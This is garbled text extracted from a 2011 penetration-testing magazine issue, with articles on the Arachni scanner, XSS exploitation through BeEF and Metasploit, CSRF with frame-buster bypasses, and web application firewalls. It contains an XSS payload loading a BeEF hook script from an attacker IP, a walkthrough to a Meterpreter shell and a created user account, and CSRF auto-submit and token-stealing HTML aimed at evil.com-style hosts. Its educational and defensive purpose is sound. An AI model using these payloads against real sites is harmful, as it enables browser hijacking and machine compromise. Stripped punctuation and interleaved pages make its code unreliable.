The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
